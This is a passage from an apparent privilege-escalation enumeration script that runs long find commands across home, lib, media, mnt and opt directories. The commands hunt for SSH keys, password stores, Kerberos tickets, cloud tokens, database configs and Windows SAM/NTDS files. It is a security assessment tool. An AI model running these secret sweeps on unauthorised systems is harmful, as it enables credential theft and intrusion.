\"password*.ibd\" -o -name \"web*.config\" -o -name \"adc.json\" -o -name
\"setupinfo.bak\" -o -name \"database.php\" -o -name
\".sudo_as_admin_successful\" -o -name \"snyk.config.json\" -o -name \"*.timer\"
-o -name \"AzureRMContext.json\" -o -name \"debian.cnf\" -o -name
\"postgresql.conf\" -o -name \"TokenCache.dat\" -o -name \"pgsql.conf\" -o -name
\"*.pub\" -o -name \".gitconfig\" -o -name \"krb5.conf\" -o -name
\"known_hosts\" -o -name \"*.kdbx\" -o -name \".vault-token\" -o -name
\"ftp.ini\" -o -name \"*.viminfo\" -o -name \"hosts.equiv\" -o -name
\"iis6.log\" -o -name \"drives.xml\" -o -name \"crio.sock\" -o -name
\"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name \"redis.conf\" -o -name
\"ddclient.conf\" -o -name \"fat.config\" -o -name \"ipsec.conf\" -o -name
\"sssd.conf\" -o -name \"sysprep.inf\" -o -name \"*config*.php\" -o -name
\"default.sav\" -o -name \"id_dsa*\" -o -name \"index.dat\" -o -name \".wgetrc\"
-o -name \"access_tokens.json\" -o -name \"security.sav\" -o -name \"*vnc*.xml\"
-o -name \"software.sav\" -o -name \".roadtools_auth\" -o -name
\"supervisord.conf\" -o -name \"ftp.config\" -o -name \"credentials.xml\" -o
-name \"rsyncd.conf\" -o -name \"docker-compose.yml\" -o -name \"master.key\" -o
-name \"*.keystore\" -o -name \"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o
-name \".rhosts\" -o -name \"autologin.conf\" -o -name \"api_key\" -o -name
\"KeePass.config*\" -o -name \"*.keyring\" -o -name \".secrets.mkey\" -o -name
\"*.service\" -o -name \"zabbix_server.conf\" -o -name \".github\" -o -name
\"KeePass.enforced*\" -o -name \".bashrc\" -o -name \"pwd.ibd\" -o -name
\"id_rsa*\" -o -name \"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name
\"*.p12\" -o -name \"NetSetup.log\" -o -name \"azureProfile.json\" -o -name
\"rpcd\" -o -name \"vsftpd.conf\" -o -name \"authorized_keys\" -o -name
\"Elastix.conf\" -o -name \"software\" -o -name \"*.csr\" -o -name
\"plum.sqlite\" -o -name \"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\"
-o -name \"groups.xml\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"*.sqlite\" -o -name
\"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"ssh*config\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB=`eval_bckgrd
"find ${ROOT_FOLDER}lib -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name
\"rocketchat.service\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null |
sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB32=`eval_bckgrd "find
${ROOT_FOLDER}lib32 -name \"*.service\" -o -name \"*.socket\" -o -name
\"log4j-core*.jar\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'.
'\\\$NC 1>&2;"` FIND_LIB64=`eval_bckgrd "find ${ROOT_FOLDER}lib64 -name
\"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name
\"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -name \"*.sqlite\" -o -name
\"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_MNT=`eval_bckgrd
"find ${ROOT_FOLDER}mnt -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"sess_*\" -o -name
\"tomcat-users.xml\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_OPT=`eval_bckgrd
"find ${ROOT_FOLDER}opt -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
